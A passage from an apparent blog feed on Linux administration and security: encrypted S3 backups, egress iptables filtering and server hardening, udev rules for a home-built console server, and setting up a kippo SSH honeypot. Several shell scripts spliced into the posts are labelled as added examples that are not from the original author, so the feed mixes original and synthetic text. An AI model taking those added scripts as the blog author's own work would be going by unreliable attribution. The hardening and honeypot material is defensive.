or die<br />my $bucket = $s3-&gt;bucket($ARGV[0]);<br />$bucket-&gt;add_key_filename($ARGV[1], $ARGV[1]) or die $s3-&gt;err . ": " . $s3-&gt;errstr;<br />exit 0;<br /></blockquote><br /><font style="font-size: 1.25em;"><b>Caveats</b></font><br /><br />To run gpg in the way I do above, importing the target key is not enough - you have to edit the imported key and set trust level to ULTIMATE or every time the script runs, you will have to interactively confirm that you are sure you want to encode data. <br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="gpg-key-trust.png" src="http://www.ctrl-alt-del.cc/2012/02/23/gpg-key-trust.png" class="mt-image-center" style="text-align: center; display: block; margin: 0 auto 20px;" height="180" width="720" /></span><br />To change trust level for the above key I did:<br /><br /><blockquote>gpg --edit-key backups<br />trust<br />5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;== for ultimate trust<br />quit<br /></blockquote><br />That's all, now the key has ultimate trust and the process can be fully automated - no more questions asked.<br /><br /><font style="font-size: 1.25em;"><b>Closing notes</b></font><br /><br />The old saying says there are two kinds of people - those who do backups and those who will do backups. In fact there is a third kind - those who test their backups... so please, test your backups, see if you can restore data, or otherwise you have just wasted your time and money to buy false sense of security.<br /><br /><b><font style="font-size: 1.25em;">UPDATE:</font></b><br />As the <i>PutObject</i> permission allows to overwrite already existing files, it's desirable to have unique file names that can't be easily determined/guessed. I have updated the backup script above to have to so calculate SHA256 hash of encrypted backup file and add resulting hash to the file name. 
This is just a result of my paranoia - better safe than sorry :-)<br />Another update is to s3upload.pl - it is more generic now, taking the bucket name and file name as command-line parameters, so you can use it for uploading things other than backups as well.<br />]]>
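        <![CDATA[The naming scheme above bakes the SHA256 of the encrypted tarball into the file name, and the closing notes ask you to actually test your backups. The shell functions below are an added example, not code from the original post: <i>name_for_backup</i> builds the same name the backup script does, and <i>verify_backup_name</i> recomputes the hash of a backup fetched back from S3 and compares it with the one in its name, so a tampered, truncated or mixed-up object is caught before it ever reaches gpg. The function names, the stand-in content and the sample date and host are my own constructions.<br /><br />
```sh
#!/bin/bash
# Added example, not from the original post: check that a backup file's
# content still matches the SHA256 embedded in its name by the script above
# (DATE-HOSTNAME-SHA256.tar.bz2.gpg). All function names here are my own.

# name_for_backup TMPFILE DATE HOSTNAME
# Prints the file name the backup script would give TMPFILE.
name_for_backup() {
    local sum
    sum=$(sha256sum "$1" | awk '{ print $1 }')
    printf '%s-%s-%s.tar.bz2.gpg\n' "$2" "$3" "$sum"
}

# verify_backup_name FILE
# Returns 0 when the hash in FILE's name equals the SHA256 of its current
# content; 1 when they differ or the name carries no 64-digit hex hash.
verify_backup_name() {
    local path="$1" base expected actual
    base=$(basename "$path")
    expected=${base%.tar.bz2.gpg}   # drop the suffix ...
    expected=${expected##*-}        # ... and keep the last '-' separated field
    case "$expected" in
        *[!0-9a-f]*|'') return 1 ;; # not a lowercase hex string
    esac
    [ ${#expected} -eq 64 ] || return 1
    actual=$(sha256sum "$path" 2>/dev/null | awk '{ print $1 }')
    [ "$actual" = "$expected" ]
}

# Walk through the scheme on constructed data: a short text file stands in
# for the gpg output, the date and host are made up.
demo() {
    local dir file
    dir=$(mktemp -d)
    printf 'constructed stand-in for gpg output\n' > "$dir/tmpbackup"
    file="$dir/$(name_for_backup "$dir/tmpbackup" 20120223 web1.example.com)"
    mv "$dir/tmpbackup" "$file"
    if verify_backup_name "$file"; then
        echo "OK:   $(basename "$file")"
    fi
    # Tampering after upload: the content changes, the name does not.
    printf 'appended by someone else\n' >> "$file"
    if ! verify_backup_name "$file"; then
        echo "FAIL: $(basename "$file") no longer matches its name"
    fi
    rm -rf "$dir"
}

demo
```
<br />Run as-is it exercises both outcomes on a scratch file; in a real restore test you would point <i>verify_backup_name</i> at the object downloaded from S3 and only pass it to gpg when the check returns 0.<br />]]>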
    </content>
</entry>

<entry>
    <title>How To Outrun A Lion?</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2011/02/how-to-outrun-a-lion.html" />
    <id>tag:www.ctrl-alt-del.cc,2011://1.40</id>

    <published>2011-02-17T09:26:56Z</published>
    <updated>2011-02-23T21:35:18Z</updated>

    <summary>You don&apos;t have to outrun a lion - it&apos;s enough you outrun the guy running next to you. Funny enough, the same stands for securing your IT infrastructure - if you are in the &quot;low hanging fruit&quot; category, you get owned...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="security" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="commonsense" label="common sense" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="firewall" label="firewall" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="hardening" label="hardening" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="monitoring" label="monitoring" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="security" label="security" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[<i>You don't have to outrun a lion - it's enough you outrun the guy running next to you.</i><br /><br />Funny enough, the same stands for securing your IT infrastructure - if you are in the "low hanging fruit" category, you get owned for sure - possibly before you even notice anything shady going on behind your shiny website. When you raise the bar a bit and step out of the damned circle, most of the attackers will give up on you and move on to find some other target that is easier to compromise. Of course that doesn't work for determined attackers that want YOU and nobody else, but that's a story for another time.<br /><br /><b>What's that smell?</b><br /><br />It's the smell of FAIL my friend...<br /><br />Just recently I was helping two of my friends and doing some forensics on their servers (or rather on what was left of them) after they noticed something strange was going on. Long story short, the key part is that the attackers owned those boxes for months before they were discovered. They got in via the path of least resistance - badly written PHP web apps (there's so many of them!), dropped c99 or a similar shell and owned the box to their liking.<br /><br />In general, we suck really bad if it takes us months to detect such hacks.<br /><br /><b>Here come the benefits of scale</b><br /><br />Wherever and whenever I look at any shared hosting providers, dedicated servers and alike, their default configuration is wide open. As long as the box is on-line and Nagios doesn't report issues, nobody is actually checking what's going on on that box. Basically operators don't care - they provide functionality and they charge you for it. Oh yes, that's exactly what they do - charge you first and then provide a ton of stuff you don't need and don't use - unless you are an attacker that is :-) <br />]]>
        <![CDATA[Plenty of dangerous PHP functions enabled, dumb/bad configuration of network services and often of the network itself, total lack of monitoring (except for Nagios)... and all of that provided by default, just in case a customer comes back and says 'oh, that breaks functionality I need'; all because that would mean they (operators) have to go back and spend some time on enabling it later. Sure, it's easier to blame it on the "bad hackers in my interwebz" - great business model guys! I believe that if you build security into your system from the start, your TCO will be lower than going with defaults (loss of clients due to compromise, cost of bringing the system back into service, etc) but that's a business decision of course.<br /><br />Default configs are similar to default passwords.<br /><br /><b>Improving security posture</b><br /><br />If you are on a shared hosting platform, there's not much you can do really. It's a <i>shared</i> host, so you (or rather the operator) have to find the common denominator - something that will satisfy everybody using this particular host. It's about finding the weakest link and bringing everybody else down to the same level - not good.<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="Weakest Link" src="http://www.ctrl-alt-del.cc/2011/02/17/weakest-link.jpg" class="mt-image-center" style="text-align: center; display: block; margin: 0pt auto 20px;" height="523" width="700" /></span>If you go with a VPS or dedicated server, you can change a lot and it won't cost you a lot of money. Simple things can improve your posture and make it much harder for the attackers to run loose on your servers. Here are just three things you can do for free...<br /><br /><b>Egress filtering</b><br /><br />Do you have an outbound firewall policy set to DROP by default? Can you imagine that in a datacenter environment?
Can it work well or will it be a huge PITA?<br /><br />Yup, easily doable and not that painful if you think about it. If we consider Linux, you can use <i>iptables</i> for that and I guess you already have an <i>iptables</i> firewall of some sort that filters inbound packets. Let's extend it a bit - the example below is for a simple web server:<br /><br /><blockquote># fail close - just in case<br />/sbin/iptables -P OUTPUT DROP<br />/sbin/iptables -F OUTPUT<br /><br /># allow responses - majority of traffic comes here so it's the first rule<br />/sbin/iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT<br /><br /># allow from self to self<br />/sbin/iptables -A OUTPUT -d 127.0.0.1 -j ACCEPT<br /><br /># allow DNS servers listed in /etc/resolv.conf<br />for DNS in `awk '/^nameserver/ { print $2 }' /etc/resolv.conf`; do<br />&nbsp;&nbsp;&nbsp;&nbsp;/sbin/iptables -A OUTPUT -p udp --dport 53 -d $DNS -j ACCEPT<br />done<br /><br /># DOMAIN_MX, LOCAL_NTP and LINUX_REPO are placeholders - set them to your own hosts<br /># allow SMTP out to email admins<br />/sbin/iptables -A OUTPUT -p tcp --dport 25 -d $DOMAIN_MX -j ACCEPT<br /><br /># allow NTP outbound, local NTP is nice to have!<br />/sbin/iptables -A OUTPUT -p udp --dport 123 -d $LOCAL_NTP -j ACCEPT<br /><br /># allow connections to our Linux repository mirror for updates<br />/sbin/iptables -A OUTPUT -p tcp -d $LINUX_REPO -j ACCEPT<br /><br /># generic log and drop all<br /># /etc/syslog.conf =&gt; kern.=debug&nbsp;&nbsp;&nbsp;&nbsp; /var/log/firewall<br />/sbin/iptables -A OUTPUT -j LOG --log-level 7 --log-prefix "FW-DROP: "<br />/sbin/iptables -A OUTPUT -j REJECT --reject-with icmp-host-prohibited<br /></blockquote><br /><i>Simple?</i> Yes!<br /><i>Does it raise the bar?</i> Yes!<br /><i>Do I have to write IP addresses everywhere?</i> No - iptables will resolve hostnames used in rules and I've noticed that, for example, if my <i>$LINUX_REPO</i> has several IP addresses, iptables actually creates an entry for each of them.<br /><i>But I can't do anything
else!</i> That's exactly the point - you shouldn't do anything else on a web server, unless there is a justified need for that (say, access to an SQL database on another host, etc).<br /><br />Wrapping up - all your web traffic (responses from the web server and other services hosted here) will hit the state matching rule, then you care for DNS, access to your own MX (only this one, unless you have a very good reason to do otherwise), NTP and distro updates are really nice to have, then drop all the other traffic. You could add rules for remote (off-site) logging, so you know when something tries to call out/pops your box.<br /><br />Now, when an attacker drops his PHP shell he is pretty limited (no call back home, no portscans, no IRC bots, etc), unless he escalates access to root, but hey - how about a network based firewall implementing the above?<br /><br /><b>Server hardening</b><br /><br />Wow, you could write a book on that, but let's stick to the basics:<br /><ul><li>Install only the software you really really need (do you need that gcc and all the dev libraries to run your web server?) - remove what was installed and is not needed - you can always put it back if you need it later!</li><li>Turn off all services that shouldn't be running - my rule of thumb is to bring the system to the point where I can run it entirely without any firewall, because there are no services to hide.</li><li>Keep your software updated - cron is your friend (to see what updates are available).</li><li>Kernel hardening - <a href="http://fedoraproject.org/wiki/SELinux">SELinux</a> and <a href="http://grsecurity.net/">Grsecurity</a> (+RBAC) seem to be the key candidates here. Yes, that can take a lot of time to set up, but in most cases it's well worth it.</li></ul>Just try to imagine how annoying it has to be for an attacker to own the box via a web app, get root via local privilege escalation and not be able to install his rootkit (and hide) because the kernel is monolithic (no loadable module support) and has grsecurity baked in, with IP logging on resource overstep and other nice features it offers.<br /><br />BTW here's the funny note left in one of the toolkits I lifted from one of my friend's servers - what you make of it is up to you. Oh... and credit to Ingo Molnár for his exploits and awesome comments in their source code ;-)<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="funny.jpg" src="http://www.ctrl-alt-del.cc/2011/02/17/funny.jpg" class="mt-image-center" style="text-align: center; display: block; margin: 0pt auto 20px;" width="700" /></span><br /><b>Logging and monitoring</b><br /><br />Best things are free, right? How about using the syslog that comes with the system to send the logs off-site? Make a small box somewhere and simply pump it all out, so you have an off-site record in case of unwanted guests showing up.<br />Not enough bandwidth you say? There's an app for that - pump logs out via OpenVPN using LZO compression with or without encryption (hint: you can set the cipher to none) and as my tests show, this can drop your logging bandwidth by around 80% and on top of that you can do traffic shaping in OpenVPN itself.<br /><br />Now, having logs and not looking at them is a waste of resources, unless you are a "checkbox security" organization and need it for compliance on paper... Depending on your pocket condition, you can use simple scripts to get what you need or get some free tools that sift through and visualize large amounts of data.
For example <a href="http://www.splunk.com/">Splunk</a> has a free edition (up to 500MB raw log input per day) and there are many other (mostly paid for) products that you could use. Even "cloud based" services like <a href="http://www.loggly.com/">Loggly</a> (which also offers a free developer account) are available these days - simply pick something that works for you.<br /><br /><br />It is not rocket science - it's really about common sense, so calm down and carry on.<br /><br /><br /><div><b>UPDATE:</b><br />As <a href="http://twitter.com/denishowe">@denishowe</a> pointed out "it seems we need a checklist for dumb providers with the list of things to disable and another checklist for dumb users, so they can enable what they really need" - yes, that might just work :-)<br /></div>]]>
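        <![CDATA[The last two rules of the egress script above log every dropped outbound packet with the prefix <i>FW-DROP: </i>, and the text suggests keeping an eye on a box that suddenly tries to call out. The script below is an added example, not code from the original post: it summarises those kernel log lines by protocol, destination and port, so a new outbound destination (an IRC server, a resolver that is not in resolv.conf) stands out in a daily report. The log lines are constructed in the iptables LOG format with addresses from the documentation ranges, and the function names are my own.<br /><br />
```sh
#!/bin/bash
# Added example, not from the original post: summarise the "FW-DROP: " lines
# that the OUTPUT chain above writes to syslog. Function names are my own;
# the log lines are constructed (RFC 5737 documentation addresses).

# write_sample_log FILE - constructed kernel log lines in iptables LOG format,
# plus one unrelated kernel message that must be ignored
write_sample_log() {
    cat > "$1" <<'EOF'
Feb 17 09:26:56 web1 kernel: FW-DROP: IN= OUT=eth0 SRC=192.0.2.10 DST=198.51.100.23 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1001 DF PROTO=TCP SPT=51234 DPT=6667 WINDOW=29200 RES=0x00 SYN URGP=0
Feb 17 09:26:57 web1 kernel: FW-DROP: IN= OUT=eth0 SRC=192.0.2.10 DST=198.51.100.23 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1002 DF PROTO=TCP SPT=51235 DPT=6667 WINDOW=29200 RES=0x00 SYN URGP=0
Feb 17 09:27:02 web1 kernel: FW-DROP: IN= OUT=eth0 SRC=192.0.2.10 DST=203.0.113.5 LEN=73 TOS=0x00 PREC=0x00 TTL=64 ID=1003 DF PROTO=UDP SPT=40001 DPT=53 LEN=53
Feb 17 09:27:10 web1 kernel: FW-DROP: IN= OUT=eth0 SRC=192.0.2.10 DST=198.51.100.23 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1004 DF PROTO=TCP SPT=51236 DPT=6667 WINDOW=29200 RES=0x00 SYN URGP=0
Feb 17 09:27:30 web1 kernel: FW-DROP: IN= OUT=eth0 SRC=192.0.2.10 DST=198.51.100.77 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1005 DF PROTO=TCP SPT=51237 DPT=80 WINDOW=29200 RES=0x00 SYN URGP=0
Feb 17 09:28:00 web1 kernel: eth0: link is up, 1000 Mbps, full duplex
EOF
}

# summarize_fw_drops FILE
# Prints one "COUNT PROTO DST DPT" line per distinct destination, busiest first.
summarize_fw_drops() {
    grep 'FW-DROP: ' "$1" | awk '
    {
        proto = "-"; dst = "-"; dpt = "-"
        # iptables LOG emits KEY=VALUE tokens; pick the three we report on
        for (i = 1; i <= NF; i++) {
            n = index($i, "=")
            if (n == 0) continue
            key = substr($i, 1, n - 1); val = substr($i, n + 1)
            if (key == "PROTO") proto = val
            else if (key == "DST") dst = val
            else if (key == "DPT") dpt = val
        }
        count[proto " " dst " " dpt]++
    }
    END { for (k in count) print count[k], k }' | sort -k1,1nr -k2
}

# top_fw_drop FILE - the single busiest destination line
top_fw_drop() {
    summarize_fw_drops "$1" | head -n 1
}

# fw_drop_count FILE - how many distinct (proto, dst, dpt) tuples were dropped
fw_drop_count() {
    summarize_fw_drops "$1" | grep -c .
}

demo() {
    local f
    f=$(mktemp)
    write_sample_log "$f"
    echo "dropped outbound connections by destination:"
    summarize_fw_drops "$f"
    rm -f "$f"
}

demo
```
<br />Pointed at the real /var/log/firewall this gives the daily "who did this server try to talk to" list; anything that is not your MX, NTP or repository mirror deserves a look.<br />]]>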
    </content>
</entry>

<entry>
    <title>Building cheap console server</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2010/11/building-console-server.html" />
    <id>tag:www.ctrl-alt-del.cc,2010://1.39</id>

    <published>2010-11-24T22:15:01Z</published>
    <updated>2010-11-24T22:54:40Z</updated>

    <summary>This time from the department of almost wasted time... We all know that serial ports come very handy when you need to (re)configure something like a switch/server/firewall or similar device. In theory you can do that over TCP/IP nowadays with one...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="hardware" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="solutions" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="console" label="console" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="hardware" label="hardware" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="sheevaplug" label="SheevaPlug" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="udev" label="udev" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="usb" label="USB" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[This time from the department of almost wasted time...<br /><br />We all know that serial ports come in very handy when you need to (re)configure something like a switch/server/firewall or similar device. In theory you can do that over TCP/IP nowadays, with one catch - you need to have connectivity. All would be ok if not for the fact that those very switches/firewalls you want to reconfigure actually provide the connectivity you need :-)<br /><br /><b>The Idea</b><br /><br />Now... why spend hundreds of pounds/dollars on off-the-shelf kit? Sure, it's cool, properly built and works unless you mess it up, but where's the fun part?! Today I needed a very very quick and cheap solution, so:<br /><br /><ol><li>SheevaPlug - £114.00</li><li>13-port USB hub - £19.99</li><li>USB-serial dongles (pl2303) - £14.99 each</li></ol>This way I have a fully networked console server with 4 ports for just under £200 - acceptable, especially when the whole thing is running off DHCP and calls home via OpenVPN - very easy to deploy!<br /><br /><b>Tricky bits</b><br /><br />A generic Sheeva has one USB host port and the hub has 13 of them - I want to send it off to a remote location and have somebody plug it in and not mess up what's where. The trick is to write appropriate udev rules to detect the adapters and give them <i>ttyUSBn</i> names according to the physical port on the hub.<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="13x-usb-hub.jpg" src="http://www.ctrl-alt-del.cc/2010/11/24/13x-usb-hub.jpg" class="mt-image-center" style="text-align: center; display: block; margin: 0pt auto 20px;" height="449" width="600" /></span>All would be fine and easy if it worked as documented - sadly it doesn't. The first problem was that <i>ATTRS{devpath}</i> (as returned by <i>udevadm info --attribute-walk -n /dev/ttyUSBn</i>, which allows you to distinguish USB ports) was used by the rule in tests but wasn't propagated properly on any of my Debian or Ubuntu boxes.
Then I tried to match <i>KERNELS</i> for parent devices - nope... if you go too far up the tree it doesn't see s**t :-/<br /> ]]>
        <![CDATA[<b>The Solution</b><br /><br />Finally I got the working rule set - long story short, here it is:<br /><br /><font style="font-size: 0.8em;">KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.1:1.0",&nbsp;&nbsp; NAME="ttyUSB0"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.1:1.0", NAME="ttyUSB1"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.2:1.0", NAME="ttyUSB2"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.3:1.0", NAME="ttyUSB3"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.4:1.0", NAME="ttyUSB4"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.4:1.0", NAME="ttyUSB5"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.3:1.0", NAME="ttyUSB6"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.2:1.0", NAME="ttyUSB7"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.1:1.0", NAME="ttyUSB8"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.4:1.0", NAME="ttyUSB9"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.3:1.0", NAME="ttyUSB10"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.2:1.0", NAME="ttyUSB11"<br />KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.1:1.0", NAME="ttyUSB12"</font><br /><br />I had to use <i>KERNELS</i> match as above to have variables seen by the rule. 
I still don't know (and at this moment don't care any more) why it didn't work as documented...<br /><br />The bottom line is that it works, and it can be done way cheaper than commercial solutions, literally at a fraction of the cost - if you don't mind the spider-ish look of it :-)<br /><br /><br /><b>Update:</b><br />Hat tip to <a href="http://twitter.com/herkii">@herkii</a> for pointing out <a href="http://kitenet.net/%7Ejoey/blog/entry/random_tip:_per-port_naming_for_identical_USB_devices/">another approach</a>.<br />]]>
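        <![CDATA[Thirteen near-identical rules like the ones above are easy to get wrong when edited by hand: a copied line that keeps an old <i>NAME</i> or an old <i>KERNELS</i> value makes two adapters fight over one device node, and udev won't complain. The script below is an added example, not code from the original post: it extracts the hub-port to tty mapping from a rule file and refuses a set in which any <i>KERNELS</i> or <i>NAME</i> value repeats. The sample input is the rule set from the post; the function names are my own.<br /><br />
```sh
#!/bin/bash
# Added example, not from the original post: lint a hand-maintained udev rule
# file like the one above, where each rule pins one hub port (KERNELS) to one
# device name (NAME). Function names are my own.

# write_rules FILE - the 13 rules from the post, used as sample input
write_rules() {
    cat > "$1" <<'EOF'
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.1:1.0",   NAME="ttyUSB0"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.1:1.0", NAME="ttyUSB1"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.2:1.0", NAME="ttyUSB2"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.3:1.0", NAME="ttyUSB3"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.4:1.0", NAME="ttyUSB4"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.4:1.0", NAME="ttyUSB5"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.3:1.0", NAME="ttyUSB6"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.2:1.0", NAME="ttyUSB7"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.3.1:1.0", NAME="ttyUSB8"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.4:1.0", NAME="ttyUSB9"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.3:1.0", NAME="ttyUSB10"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.2:1.0", NAME="ttyUSB11"
KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.2.1:1.0", NAME="ttyUSB12"
EOF
}

# udev_port_map FILE - one "KERNELS NAME" pair per rule, e.g. "1-1.1:1.0 ttyUSB0"
udev_port_map() {
    sed -n 's/.*KERNELS=="\([^"]*\)".*NAME="\([^"]*\)".*/\1 \2/p' "$1"
}

# udev_check_unique FILE
# Returns 0 when every KERNELS and every NAME value occurs exactly once;
# otherwise lists the repeated values on stderr and returns 1.
udev_check_unique() {
    local dup_ports dup_names
    dup_ports=$(udev_port_map "$1" | awk '{ print $1 }' | sort | uniq -d)
    dup_names=$(udev_port_map "$1" | awk '{ print $2 }' | sort | uniq -d)
    if [ -z "$dup_ports" ] && [ -z "$dup_names" ]; then
        return 0
    fi
    [ -n "$dup_ports" ] && echo "repeated KERNELS: $dup_ports" >&2
    [ -n "$dup_names" ] && echo "repeated NAME: $dup_names" >&2
    return 1
}

demo() {
    local f
    f=$(mktemp)
    write_rules "$f"
    echo "hub port -> device name:"
    udev_port_map "$f"
    udev_check_unique "$f" && echo "rule set is consistent"
    # The classic copy-paste slip: a new port given a name that is already taken.
    printf 'KERNEL=="ttyUSB*", SUBSYSTEM=="tty", DRIVERS=="pl2303", KERNELS=="1-1.4.5:1.0", NAME="ttyUSB3"\n' >> "$f"
    udev_check_unique "$f" || echo "rule set rejected after the duplicate NAME"
    rm -f "$f"
}

demo
```
<br />Run it against /etc/udev/rules.d/&lt;your file&gt; before shipping the box to the remote site; the port map it prints is also the label you want taped to the hub.<br />]]>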
    </content>
</entry>

<entry>
    <title>Making new friends with kippo</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2010/07/making-new-friends-with-kippo.html" />
    <id>tag:www.ctrl-alt-del.cc,2010://1.38</id>

    <published>2010-07-31T01:59:22Z</published>
    <updated>2010-07-31T02:19:49Z</updated>

    <summary>Less than two weeks ago I&apos;ve sent a tweet asking for honeypot recommendations. I wanted to play a bit with something new, something I never did before, mostly because I never had time for it (right, like I have it...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="security" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="software" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="honeypots" label="honeypots" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="ssh" label="ssh" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[Less than two weeks ago I sent a tweet asking for honeypot recommendations. I wanted to play a bit with something new, something I never did before, mostly because I never had time for it (right, like I have it now). Anyway, thanks to all the great people that replied to my tweet I've learned a lot and found some great software. Now it's time to give something back to the community.<br /><br /><b>Kippo - simply amazing</b><br /><br />The first honeypot I reached for was <a href="http://code.google.com/p/kippo/">kippo</a>. It is a medium interaction SSH honeypot designed to log brute force attacks and to log the whole session as it goes - including timings, typos, etc. The magic sauce is that you can play the session back (with typos!) and see what the attackers are made of. Believe me - playing back those sessions is totally amazing! Some samples are available on the project's page.<br />There are also other features to like, like trapping sessions and not disconnecting them even if the bad guys do log out, logging the ssh client used (very easy to tell scanning bots apart from real people), quite nice interaction and most of all an easy way to extend your honeypot with your own commands.<br />]]>
        <![CDATA[<b>Installing kippo</b><br />
<br />
For the base platform I used one of my Debian hosts and started with
kippo 0.4. It was good to see how to run it, but options are limited,
so go full steam ahead and get SVN version - it is well worth it!<br /><br />
By default kippo runs on port 2222 but I wanted it on port 22 as normal
SSH would be (running as unprivileged user), so I've set it up on one
of my unused IP addresses - the setup was very easy.<br />
<br />
Before you grab the latest version from SVN repo, you should install
required python packages (dependencies will be pulled in
automagically): <br />
<br />
<blockquote><tt>apt-get install python-twisted</tt><br /><tt>
svn checkout http://kippo.googlecode.com/svn/trunk/ kippo-read-only</tt><br /></blockquote>
<br />
Main benefit of SVN version is that it can use MySQL to log events
(alongside the regular log file) and that it can actually bind to given
IP address - version 0.4 binds to all available addresses which is a
bummer for me when I want to spawn totally fake host and have normal
ssh working as well.<br />
<br />
<b>Honeypots - rule #1</b><br />
<br />
<font color="red">DO NOT run honeypot as root!</font><br />
<br />
Remember that honeypots are software components, they may (and most
likely do) have their own bugs. Of course you have to be root
to bind to port &lt;1024, or do you?<br />
<br />
<b>Configuration</b><br />
<br />
Couldn't be easier... create an unprivileged, regular user account to run
your honeypot (I called it honeytrap), create your own <tt>kippo.cfg</tt> using
<tt>kippo.cfg.dist</tt> as template, set MySQL parameters, honeypot hostname
(attackers will see it after they log in), IP address to bind to and
port. If you don't want to use MySQL - your call... it may come very
handy for reporting. That's it - you are ready to go.<br />
<br />
Now the trick is to get it running on port 22. There is obviously more
than one way to do it. If you have only one IP address available, you
should most likely go to kippo's Wiki page that describes how to <a href="http://code.google.com/p/kippo/wiki/MakingKippoReachable">make
kippo reachable through port 22</a> but if you
have spare IP address... =B-]<br />
<br />
Now, how do I bind to port 22 as regular user? Somebody must have solved that problem before, right?
Sure, and they even created a package that solves this issue! It's called authbind and it's amazingly easy to use.<br />
<br />
<blockquote><tt>apt-get&nbsp; install authbind</tt><br /><tt>
touch /etc/authbind/byport/22</tt><br /><tt>
chown honeytrap:honeytrap /etc/authbind/byport/22</tt><br /><tt>
chmod +x /etc/authbind/byport/22</tt><br /></blockquote>
<br />
Authbind works almost like sudo, except for the ports - not the
commands. In kippo's directory you will find start.sh script - add
<tt>authbind</tt> in front of the startup command and you are good to go.<br />
<br />
<b>Ready, set, go!</b><br />
<br />
Ok - don't make my mistake... test your install - ssh into the honeypot and
see if you can log in. The root password is in kippo.cfg. Testing the setup
is important - if the SQL database is gone, then you won't log in and
kippo.log will say that the root password was incorrect, when in
fact the problem is a disconnected SQL log backend.<br />
<br />
<b>Observations</b><br />
<br />
Kippo is a really great tool to learn what the bad guys are up to. If
they add a user, they can log in as that user later. If they change the root
password, it will be there for them when they return. The best part is
that of course you can see those passwords and suddenly you will have
new 'accounts' added and new, correct and active at the same time root
passwords (yes, more than one correct password!). <br /><br />I've spent some time
watching the sessions recorded so far - there's so much to see, laugh
